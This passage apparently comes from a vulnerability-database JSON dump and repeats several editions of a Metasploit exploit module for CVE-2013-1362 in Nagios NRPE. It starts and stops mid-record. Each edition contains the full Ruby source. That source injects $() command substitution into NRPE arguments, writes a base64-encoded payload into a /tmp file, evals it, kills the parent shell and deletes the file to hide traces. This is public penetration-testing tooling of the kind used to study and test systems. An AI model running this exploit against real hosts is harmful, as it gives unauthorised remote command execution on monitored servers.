"https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-01T09:38:44", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-01T13:38:45", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-01T13:38:45", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-02T19:40:23", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-02T19:40:23", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-02T21:37:09", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-02T21:37:09", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-09T13:37:56", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-09T13:37:56", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-09T15:39:13", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant 